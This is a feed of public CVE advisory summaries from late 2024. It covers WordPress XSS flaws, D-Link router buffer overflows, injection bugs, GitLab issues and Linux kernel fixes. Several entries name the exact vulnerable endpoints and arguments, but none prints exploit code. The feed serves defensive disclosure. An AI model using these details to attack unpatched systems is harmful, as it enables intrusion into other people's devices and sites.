🚨 CVE-2024-9324A vulnerability was found in Intelbras InControl up to 2.21.57. It has been rated as critical. Affected by this issue is some unknown functionality of the file /v1/operador/ of the component Relatório de Operadores Page. The manipulation of the argument fields leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was informed early on 2024-07-19 about this issue. The release of a fixed version 2.21.58 was announced for the end of August 2024 but then was postponed until 2024-09-20.🎖@cveNotify |
|
| 2024-10-07 16:07:31 |
🚨 CVE-2024-8712The GTM Server Side plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.19. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-07 16:07:30 |
🚨 CVE-2024-6722The Chatbot Support AI: Free ChatGPT Chatbot, Woocommerce Chatbot WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-10-07 16:07:26 |
🚨 CVE-2024-6020The Sign-up Sheets WordPress plugin before 2.2.13 does not escape some generated URLs, as well as the $_SERVER['REQUEST_URI'] parameter before outputting them back in attributes, which could lead to Reflected Cross-Site Scripting.🎖@cveNotify |
|
| 2024-10-07 16:07:25 |
🚨 CVE-2024-6927The Viral Signup WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-10-07 16:07:24 |
🚨 CVE-2024-5417The Gutentor WordPress plugin before 3.3.6 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-10-07 15:37:38 |
🚨 CVE-2024-9568A vulnerability, which was classified as critical, was found in D-Link DIR-619L B1 2.06. Affected is the function formAdvNetwork of the file /goform/formAdvNetwork. The manipulation of the argument curTime leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-07 15:37:37 |
🚨 CVE-2024-45933OnlineNewsSite v1.0 is vulnerable to Cross Site Scripting (XSS) which allows attackers to execute arbitrary code via the Title and summary fields in the /admin/post/edit/ endpoint.🎖@cveNotify |
|
| 2024-10-07 15:07:35 |
🚨 CVE-2024-25412A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email field.🎖@cveNotify |
|
| 2024-10-07 15:07:34 |
🚨 CVE-2024-44911NASA CryptoLib v1.3.0 was discovered to contain an Out-of-Bounds read via the TC subsystem (crypto_aos.c).🎖@cveNotify |
|
| 2024-10-07 14:37:35 |
🚨 CVE-2024-9567A vulnerability, which was classified as critical, has been found in D-Link DIR-619L B1 2.06. This issue affects the function formAdvFirewall of the file /goform/formAdvFirewall. The manipulation of the argument curTime leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-07 14:37:34 |
🚨 CVE-2024-46802In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: added NULL check at start of dc_validate_stream[Why]prevent invalid memory access[How]check if dc and stream are NULL🎖@cveNotify |
|
| 2024-10-07 14:37:33 |
🚨 CVE-2024-7714The AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0 lacks sufficient access controls allowing an unauthenticated user to disconnect the AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0 from OpenAI, thereby disabling the AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0. Multiple actions are accessible: 'ays_chatgpt_disconnect', 'ays_chatgpt_connect', and 'ays_chatgpt_save_feedback'🎖@cveNotify |
|
| 2024-10-07 14:37:30 |
🚨 CVE-2024-47126The goTenna Pro series does not use SecureRandom when generating its cryptographic keys. The random function in use is not suitable for cryptographic use.🎖@cveNotify |
|
| 2024-10-07 14:37:29 |
🚨 CVE-2019-0344Due to unsafe deserialization used in SAP Commerce Cloud (virtualjdbc extension), versions 6.4, 6.5, 6.6, 6.7, 1808, 1811, 1905, it is possible to execute arbitrary code on a target machine with 'Hybris' user rights, resulting in Code Injection.🎖@cveNotify |
|
| 2024-10-07 14:37:28 |
🚨 CVE-2017-10271Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-10-07 14:07:54 |
🚨 CVE-2024-21420Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-10-07 14:07:53 |
🚨 CVE-2020-15415On DrayTek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1, cgi-bin/mainfunction.cgi/cvmcfgupload allows remote command execution via shell metacharacters in a filename when the text/x-python-script content type is used, a different issue than CVE-2020-14472.🎖@cveNotify |
|
| 2024-10-07 13:38:04 |
🚨 CVE-2024-23378Memory corruption while invoking IOCTL calls for MSM module from the user space during audio playback and record.🎖@cveNotify |
|
| 2024-10-07 13:37:57 |
🚨 CVE-2024-23375Memory corruption during the network scan request.🎖@cveNotify |
|
| 2024-10-07 13:37:56 |
🚨 CVE-2024-23370Memory corruption when a process invokes IOCTL calls from user-space to create a HAB virtual channel and another process invokes IOCTL calls to destroy the same.🎖@cveNotify |
|
| 2024-10-07 13:37:55 |
🚨 CVE-2024-23369Memory corruption when invalid length is provided from HLOS for FRS/UDS request/response buffers.🎖@cveNotify |
|
| 2024-10-07 13:37:51 |
🚨 CVE-2024-47186Filament is a collection of full-stack components for Laravel development. Versions of Filament from v3.0.0 through v3.2.114 are affected by a cross-site scripting (XSS) vulnerability. If values passed to a `ColorColumn` or `ColumnEntry` are not valid and contain a specific set of characters, applications are vulnerable to XSS attack against a user who opens a page on which a color column or entry is rendered. Filament v3.2.115 fixes this issue.🎖@cveNotify |
|
| 2024-10-07 13:37:50 |
🚨 CVE-2023-6072A cross-site scripting vulnerability in Trellix Central Management (CM) prior to 9.1.3.97129 allows a remote authenticated attacker to craft CM dashboard internal requests causing arbitrary content to be injected into the response when accessing the CM dashboard.🎖@cveNotify |
|
| 2024-10-07 13:07:27 |
🚨 CVE-2024-8325The Blockspare: Gutenberg Blocks & Patterns for Blogs, Magazines, Business Sites – Post Grids, Sliders, Carousels, Counters, Page Builder & Starter Site Imports, No Coding Needed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in the ‘blockspare_render_social_sharing_block’ function in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-07 12:37:40 |
🚨 CVE-2024-27312Zohocorp ManageEngine PAM360 version 6601 is vulnerable to authorization vulnerability which allows a low-privileged user to perform admin actions. Note: This vulnerability affects only the PAM360 6600 version. No other versions are applicable to this vulnerability.🎖@cveNotify |
|
| 2024-10-07 12:37:39 |
🚨 CVE-2023-6203The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request🎖@cveNotify |
|
| 2024-10-07 12:37:38 |
🚨 CVE-2019-15109The the-events-calendar plugin before 4.8.2 for WordPress has XSS via the tribe_paged URL parameter.🎖@cveNotify |
|
| 2024-10-07 06:37:24 |
🚨 CVE-2024-47335Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Bit Form Bit Form – Contact Form Plugin allows SQL Injection.This issue affects Bit Form – Contact Form Plugin: from n/a through 2.13.11.🎖@cveNotify |
|
| 2024-10-07 04:37:24 |
🚨 CVE-2024-20094In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00843282; Issue ID: MSV-1535.🎖@cveNotify |
|
| 2024-10-07 03:37:32 |
🚨 CVE-2024-20095In m4u, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08996894; Issue ID: MSV-1636.🎖@cveNotify |
|
| 2024-10-07 03:37:25 |
🚨 CVE-2024-20092In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09028313; Issue ID: MSV-1700.🎖@cveNotify |
|
| 2024-10-07 03:37:24 |
🚨 CVE-2024-20090In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09028313; Issue ID: MSV-1703.🎖@cveNotify |
|
| 2024-10-07 01:37:24 |
🚨 CVE-2024-9564A vulnerability, which was classified as critical, was found in D-Link DIR-605L 2.13B01 BETA. Affected is the function formWlanWizardSetup of the file /goform/formWlanWizardSetup. The manipulation of the argument webpage leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-07 00:37:47 |
🚨 CVE-2024-9563A vulnerability, which was classified as critical, has been found in D-Link DIR-605L 2.13B01 BETA. This issue affects the function formWlanSetup_Wizard of the file /goform/formWlanSetup_Wizard. The manipulation of the argument webpage leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-06 23:37:25 |
🚨 CVE-2024-9562A vulnerability classified as critical was found in D-Link DIR-605L 2.13B01 BETA. This vulnerability affects the function formSetWizard1/formSetWizard2. The manipulation of the argument curTime leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-06 23:37:24 |
🚨 CVE-2024-9561A vulnerability classified as critical has been found in D-Link DIR-605L 2.13B01 BETA. This affects the function formSetWAN_Wizard51/formSetWAN_Wizard52. The manipulation of the argument curTime leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-06 22:37:24 |
🚨 CVE-2024-9560A vulnerability was found in ESAFENET CDG V5. It has been rated as critical. Affected by this issue is the function delCatelogs of the file /CDGServer3/document/Catelogs;logindojojs?command=DelCatelogs. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-06 21:37:24 |
🚨 CVE-2024-47854An XSS vulnerability was discovered in Veritas Data Insight before 7.1. It allows a remote attacker to inject an arbitrary web script into an HTTP request that could reflect back to an authenticated user without sanitization if executed by that user.🎖@cveNotify |
|
| 2024-10-06 19:37:24 |
🚨 CVE-2024-9559A vulnerability was found in D-Link DIR-605L 2.13B01 BETA. It has been classified as critical. Affected is the function formWlanSetup of the file /goform/formWlanSetup. The manipulation of the argument webpage leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-06 18:37:24 |
🚨 CVE-2024-9558A vulnerability was found in D-Link DIR-605L 2.13B01 BETA and classified as critical. This issue affects the function formSetWanPPTP of the file /goform/formSetWanPPTP. The manipulation of the argument webpage leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-06 17:37:24 |
🚨 CVE-2024-9557A vulnerability has been found in D-Link DIR-605L 2.13B01 BETA and classified as critical. This vulnerability affects the function formSetWanPPPoE of the file /goform/formSetWanPPPoE. The manipulation of the argument webpage leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-06 16:37:24 |
🚨 CVE-2024-9556A vulnerability, which was classified as critical, was found in D-Link DIR-605L 2.13B01 BETA. This affects the function formSetEnableWizard of the file /goform/formSetEnableWizard. The manipulation of the argument curTime leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-16 02:37:24 |
🚨 CVE-2024-46958In Nextcloud Desktop Client 3.13.1 through 3.13.3 on Linux, synchronized files (between the server and client) may become world writable or world readable. This is fixed in 3.13.4.🎖@cveNotify |
|
| 2024-09-16 01:37:34 |
🚨 CVE-2024-8880A vulnerability classified as critical has been found in playSMS 1.4.4/1.4.5/1.4.6/1.4.7. Affected is an unknown function of the file /playsms/index.php?app=main&inc=core_auth&route=forgot&op=forgot of the component Template Handler. The manipulation of the argument username/email/captcha leads to code injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The project maintainer was informed early about the issue. Investigation shows that playSMS up to 1.4.3 contained a fix but later versions re-introduced the flaw. As long as the latest version of the playsms/tpl package is used, the software is not affected. Version >=1.4.4 shall fix this issue for sure.🎖@cveNotify |
|
| 2024-09-15 23:37:25 |
🚨 CVE-2024-46943An issue was discovered in OpenDaylight Authentication, Authorization and Accounting (AAA) through 0.19.3. A rogue controller can join a cluster to impersonate an offline peer, even if this rogue controller does not possess the complete cluster configuration information.🎖@cveNotify |
|
| 2024-09-15 23:37:24 |
🚨 CVE-2024-46942In OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) through 13.0.1, a controller with a follower role can configure flow entries in an OpenDaylight clustering deployment.🎖@cveNotify |
|
| 2024-09-15 22:37:25 |
🚨 CVE-2024-8875A vulnerability classified as critical was found in vedees wcms up to 0.3.2. Affected by this vulnerability is an unknown functionality of the file /wex/finder.php. The manipulation of the argument p leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-15 22:37:24 |
🚨 CVE-2024-46938An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.🎖@cveNotify |
|
| 2024-09-15 20:37:26 |
🚨 CVE-2024-46918app/Controller/UserLoginProfilesController.php in MISP before 2.4.198 does not prevent an org admin from viewing sensitive login fields of another org admin in the same org.🎖@cveNotify |
|
| 2024-09-15 20:37:25 |
🚨 CVE-2024-33881An issue was discovered in VirtoSoftware Virto Bulk File Download 5.5.44 for SharePoint 2019. The Virto.SharePoint.FileDownloader/Api/Download.ashx isCompleted method allows an NTLMv2 hash leak via a UNC share pathname in the path parameter.🎖@cveNotify |
|
| 2024-09-15 20:37:24 |
🚨 CVE-2012-6664Multiple directory traversal vulnerabilities in the TFTP Server in Distinct Intranet Servers 3.10 and earlier allow remote attackers to read or write arbitrary files via a .. (dot dot) in the (1) get or (2) put commands.🎖@cveNotify |
|
| 2024-09-15 19:37:25 |
🚨 CVE-2024-33868An issue was discovered in linqi before 1.4.0.1 on Windows. There is LDAP injection.🎖@cveNotify |
|
| 2024-09-15 19:37:24 |
🚨 CVE-2024-30922SQL Injection vulnerability in DerbyNet v9.0 allows a remote attacker to execute arbitrary code via the where Clause in Award Document Rendering.🎖@cveNotify |
|
| 2024-09-15 18:37:25 |
🚨 CVE-2024-45003In the Linux kernel, the following vulnerability has been resolved:vfs: Don't evict inode under the inode lru traversing contextThe inode reclaiming process(See function prune_icache_sb) collects allreclaimable inodes and mark them with I_FREEING flag at first, at thattime, other processes will be stuck if they try getting these inodes(See function find_inode_fast), then the reclaiming process destroy theinodes by function dispose_list(). Some filesystems(eg. ext4 withea_inode feature, ubifs with xattr) may do inode lookup in the inodeevicting callback function, if the inode lookup is operated under theinode lru traversing context, deadlock problems may happen.Case 1: In function ext4_evict_inode(), the ea inode lookup could happen if ea_inode feature is enabled, the lookup process will be stuck under the evicting context like this: 1. File A has inode i_reg and an ea inode i_ea 2. getfattr(A, xattr_buf) // i_ea is added into lru // lru->i_ea 3. Then, following three processes running like this: PA PB echo 2 > /proc/sys/vm/drop_caches shrink_slab prune_dcache_sb // i_reg is added into lru, lru->i_ea->i_reg prune_icache_sb list_lru_walk_one inode_lru_isolate i_ea->i_state |= I_FREEING // set inode state inode_lru_isolate __iget(i_reg) spin_unlock(&i_reg->i_lock) spin_unlock(lru_lock) rm file A i_reg->nlink = 0 iput(i_reg) // i_reg->nlink is 0, do evict ext4_evict_inode ext4_xattr_delete_inode ext4_xattr_inode_dec_ref_all ext4_xattr_inode_iget ext4_iget(i_ea->i_ino) iget_locked find_inode_fast __wait_on_freeing_inode(i_ea) ----→ AA deadlock dispose_list // cannot be executed by prune_icache_sb wake_up_bit(&i_ea->i_state)Case 2: In deleted inode writing function ubifs_jnl_write_inode(), file deleting process holds BASEHD's wbuf->io_mutex while getting the xattr inode, which could race with inode reclaiming process(The reclaiming process could try locking BASEHD's wbuf->io_mutex in inode evicting function), then an ABBA deadlock problem would happen as following: 1. File A has inode ia and a xattr(with inode ixa), regular file B has inode ib and a xattr. 2. getfattr(A, xattr_buf) // ixa is added into lru // lru->ixa 3. Then, following three processes running like this: PA PB PC echo 2 > /proc/sys/vm/drop_caches shrink_slab prune_dcache_sb // ib and ia are added into lru, lru->ixa->ib->ia prune_icache_sb list_lru_walk_one inode_lru_isolate ixa->i_state |= I_FREEING // set inode state inode_lru_isolate __iget(ib) spin_unlock(&ib->i_lock) spin_unlock(lru_lock) rm file B ib->nlink = 0 rm file A iput(ia) ubifs_evict_inode(ia) ubifs_jnl_delete_inode(ia) ubifs_jnl_write_inode(ia) make_reservation(BASEHD) // Lock wbuf->io_mutex ubifs_iget(ixa->i_ino) iget_locked find_inode_fast __wait_on_freeing_inode(ixa) | iput(ib) // ib->nlink is 0, do evict | ubifs_evict_inode | ubifs_jnl_delete_inode(ib) ↓ ubifs_jnl_write_inode ABBA deadlock ←-----make_reservation(BASEHD) dispose_list // cannot be executed by prune_icache_sb wake_up_bit(&ixa->i_state)Fix the possible deadlock by using new inode state flag I_LRU_ISOLATINGto pin the inode in memory while inode_lru_isolate(---truncated---🎖@cveNotify |
|
| 2024-09-15 18:37:24 |
🚨 CVE-2024-44995In the Linux kernel, the following vulnerability has been resolved:net: hns3: fix a deadlock problem when config TC during resettingWhen config TC during the reset process, may cause a deadlock, the flow isas below: pf reset start │ ▼ ......setup tc │ │ ▼ ▼ DOWN: napi_disable()napi_disable()(skip) │ │ │ ▼ ▼ ...... ...... │ │ ▼ │napi_enable() │ ▼ UINIT: netif_napi_del() │ ▼ ...... │ ▼ INIT: netif_napi_add() │ ▼ ...... global reset start │ │ ▼ ▼ UP: napi_enable()(skip) ...... │ │ ▼ ▼ ...... napi_disable()In reset process, the driver will DOWN the port and then UINIT, in thiscase, the setup tc process will UP the port before UINIT, so cause theproblem. Adds a DOWN process in UINIT to fix it.🎖@cveNotify |
|
| 2024-09-15 11:37:25 |
🚨 CVE-2024-8869A vulnerability classified as critical has been found in TOTOLINK A720R 4.1.5. Affected is the function exportOvpn. The manipulation leads to os command injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-15 11:37:24 |
🚨 CVE-2024-28799IBM QRadar Suite Software 1.10.12.0 through 1.10.23.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 displays sensitive data improperly to a local user during back-end commands which may result in the unexpected disclosure of this information under certain conditions. IBM X-Force ID: 287173.🎖@cveNotify |
|
| 2024-09-15 09:37:30 |
🚨 CVE-2024-44059Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in MediaRon LLC Custom Query Blocks allows Stored XSS.This issue affects Custom Query Blocks: from n/a through 5.3.1.🎖@cveNotify |
|
| 2024-09-15 09:37:26 |
🚨 CVE-2024-44057Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CryoutCreations Nirvana allows Stored XSS.This issue affects Nirvana: from n/a through 1.6.3.🎖@cveNotify |
|
| 2024-09-15 09:37:25 |
🚨 CVE-2024-44054Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CryoutCreations Fluida allows Stored XSS.This issue affects Fluida: from n/a through 1.8.8.🎖@cveNotify |
|
| 2024-09-15 09:37:24 |
🚨 CVE-2024-44053Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mohammad Arif Opor Ayam allows Reflected XSS.This issue affects Opor Ayam: from n/a through 1.8.🎖@cveNotify |
|
| 2024-09-15 08:37:31 |
🚨 CVE-2024-45459Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in PickPlugins Product Slider for WooCommerce allows Reflected XSS.This issue affects Product Slider for WooCommerce: from n/a through 1.13.50.🎖@cveNotify |
|
| 2024-09-15 08:37:30 |
🚨 CVE-2024-45457Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Spiffy Plugins Spiffy Calendar allows Stored XSS.This issue affects Spiffy Calendar: from n/a through 4.9.13.🎖@cveNotify |
|
| 2024-09-15 08:37:26 |
🚨 CVE-2024-45455Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in JoomUnited WP Meta SEO allows Stored XSS.This issue affects WP Meta SEO: from n/a through 4.5.13.🎖@cveNotify |
|
| 2024-09-15 08:37:25 |
🚨 CVE-2024-44062Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Hiroaki Miyashita Custom Field Template allows Stored XSS.This issue affects Custom Field Template: from n/a through 2.6.5.🎖@cveNotify |
|
| 2024-09-15 08:37:24 |
🚨 CVE-2024-44060Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Jennifer Hall Filmix allows Reflected XSS.This issue affects Filmix: from n/a through 1.1.🎖@cveNotify |
|
| 2024-09-15 03:37:24 |
🚨 CVE-2024-8867A vulnerability was found in Perfex CRM 3.1.6. It has been declared as problematic. This vulnerability affects unknown code of the file application/controllers/Clients.php of the component Parameter Handler. The manipulation of the argument message leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-09-15 02:37:24 |
🚨 CVE-2024-8866A vulnerability was found in AutoCMS 5.4. It has been classified as problematic. This affects an unknown part of the file /admin/robot.php. The manipulation of the argument sidebar leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-15 01:37:24 |
🚨 CVE-2024-8864A vulnerability has been found in composiohq composio up to 0.5.6 and classified as critical. Affected by this vulnerability is the function Calculator of the file python/composio/tools/local/mathematical/actions/calculator.py. The manipulation leads to code injection. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-14 23:37:24 |
🚨 CVE-2024-8863A vulnerability, which was classified as problematic, was found in aimhubio aim up to 3.24. Affected is the function dangerouslySetInnerHTML of the file textbox.tsx of the component Text Explorer. The manipulation of the argument query leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-14 20:37:24 |
🚨 CVE-2024-8862A vulnerability, which was classified as critical, has been found in h2oai h2o-3 3.46.0.4. This issue affects the function getConnectionSafe of the file /dtale/chart-data/1 of the component JDBC Connection Handler. The manipulation of the argument query leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-14 16:37:25 |
🚨 CVE-2024-46687In the Linux kernel, the following vulnerability has been resolved:btrfs: fix a use-after-free when hitting errors inside btrfs_submit_chunk()[BUG]There is an internal report that KASAN is reporting use-after-free, withthe following backtrace: BUG: KASAN: slab-use-after-free in btrfs_check_read_bio+0xa68/0xb70 [btrfs] Read of size 4 at addr ffff8881117cec28 by task kworker/u16:2/45 CPU: 1 UID: 0 PID: 45 Comm: kworker/u16:2 Not tainted 6.11.0-rc2-next-20240805-default+ #76 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014 Workqueue: btrfs-endio btrfs_end_bio_work [btrfs] Call Trace: dump_stack_lvl+0x61/0x80 print_address_description.constprop.0+0x5e/0x2f0 print_report+0x118/0x216 kasan_report+0x11d/0x1f0 btrfs_check_read_bio+0xa68/0xb70 [btrfs] process_one_work+0xce0/0x12a0 worker_thread+0x717/0x1250 kthread+0x2e3/0x3c0 ret_from_fork+0x2d/0x70 ret_from_fork_asm+0x11/0x20 Allocated by task 20917: kasan_save_stack+0x37/0x60 kasan_save_track+0x10/0x30 __kasan_slab_alloc+0x7d/0x80 kmem_cache_alloc_noprof+0x16e/0x3e0 mempool_alloc_noprof+0x12e/0x310 bio_alloc_bioset+0x3f0/0x7a0 btrfs_bio_alloc+0x2e/0x50 [btrfs] submit_extent_page+0x4d1/0xdb0 [btrfs] btrfs_do_readpage+0x8b4/0x12a0 [btrfs] btrfs_readahead+0x29a/0x430 [btrfs] read_pages+0x1a7/0xc60 page_cache_ra_unbounded+0x2ad/0x560 filemap_get_pages+0x629/0xa20 filemap_read+0x335/0xbf0 vfs_read+0x790/0xcb0 ksys_read+0xfd/0x1d0 do_syscall_64+0x6d/0x140 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Freed by task 20917: kasan_save_stack+0x37/0x60 kasan_save_track+0x10/0x30 kasan_save_free_info+0x37/0x50 __kasan_slab_free+0x4b/0x60 kmem_cache_free+0x214/0x5d0 bio_free+0xed/0x180 end_bbio_data_read+0x1cc/0x580 [btrfs] btrfs_submit_chunk+0x98d/0x1880 [btrfs] btrfs_submit_bio+0x33/0x70 [btrfs] submit_one_bio+0xd4/0x130 [btrfs] submit_extent_page+0x3ea/0xdb0 [btrfs] btrfs_do_readpage+0x8b4/0x12a0 [btrfs] btrfs_readahead+0x29a/0x430 [btrfs] read_pages+0x1a7/0xc60 page_cache_ra_unbounded+0x2ad/0x560 filemap_get_pages+0x629/0xa20 filemap_read+0x335/0xbf0 vfs_read+0x790/0xcb0 ksys_read+0xfd/0x1d0 do_syscall_64+0x6d/0x140 entry_SYSCALL_64_after_hwframe+0x4b/0x53[CAUSE]Although I cannot reproduce the error, the report itself is good enoughto pin down the cause.The call trace is the regular endio workqueue context, but thefree-by-task trace is showing that during btrfs_submit_chunk() wealready hit a critical error, and is calling btrfs_bio_end_io() to errorout. And the original endio function called bio_put() to free the wholebio.This means a double freeing thus causing use-after-free, e.g.:1. Enter btrfs_submit_bio() with a read bio The read bio length is 128K, crossing two 64K stripes.2. The first run of btrfs_submit_chunk()2.1 Call btrfs_map_block(), which returns 64K2.2 Call btrfs_split_bio() Now there are two bios, one referring to the first 64K, the other referring to the second 64K.2.3 The first half is submitted.3. The second run of btrfs_submit_chunk()3.1 Call btrfs_map_block(), which by somehow failed Now we call btrfs_bio_end_io() to handle the error3.2 btrfs_bio_end_io() calls the original endio function Which is end_bbio_data_read(), and it calls bio_put() for the original bio. Now the original bio is freed.4. The submitted first 64K bio finished Now we call into btrfs_check_read_bio() and tries to advance the bio iter. But since the original bio (thus its iter) is already freed, we trigger the above use-after free. And even if the memory is not poisoned/corrupted, we will later call the original endio function, causing a double freeing.[FIX]Instead of calling btrfs_bio_end_io(), call btrfs_orig_bbio_end_io(),which has the extra check on split bios and do the pr---truncated---🎖@cveNotify |
|
| 2024-09-14 16:37:24 |
🚨 CVE-2024-46686In the Linux kernel, the following vulnerability has been resolved:smb/client: avoid dereferencing rdata=NULL in smb2_new_read_req()This happens when called from SMB2_read() while using rdmaand reaching the rdma_readwrite_threshold.🎖@cveNotify |
|
| 2024-09-14 16:07:26 |
🚨 CVE-2024-46685In the Linux kernel, the following vulnerability has been resolved:pinctrl: single: fix potential NULL dereference in pcs_get_function()pinmux_generic_get_function() can return NULL and the pointer 'function'was dereferenced without checking against NULL. Add checking of pointer'function' in pcs_get_function().Found by code review.🎖@cveNotify |
|
| 2024-09-14 16:07:25 |
🚨 CVE-2024-8754An issue has been discovered in GitLab EE/CE affecting all versions from 16.9.7 prior to 17.1.7, 17.2 prior to 17.2.5, and 17.3 prior to 17.3.2. An improper input validation error allows attacker to squat on accounts via linking arbitrary unclaimed provider identities when JWT authentication is configured.🎖@cveNotify |
|
| 2024-09-14 16:07:24 |
🚨 CVE-2024-8640An issue has been discovered in GitLab EE affecting all versions starting from 16.11 prior to 17.1.7, from 17.2 prior to 17.2.5, and from 17.3 prior to 17.3.2. Due to incomplete input filtering, it was possible to inject commands into a connected Cube server.🎖@cveNotify |
|
| 2024-09-14 15:37:26 |
🚨 CVE-2024-8635A server-side request forgery issue has been discovered in GitLab EE affecting all versions starting from 16.8 prior to 17.1.7, from 17.2 prior to 17.2.5, and from 17.3 prior to 17.3.2. It was possible for an attacker to make requests to internal resources using a custom Maven Dependency Proxy URL🎖@cveNotify |
|
| 2024-09-14 15:37:25 |
🚨 CVE-2024-6446An issue has been discovered in GitLab affecting all versions starting from 17.1 to 17.1.7, 17.2 prior to 17.2.5 and 17.3 prior to 17.3.2. A crafted URL could be used to trick a victim to trust an attacker controlled application.🎖@cveNotify |
|
| 2024-09-14 15:37:24 |
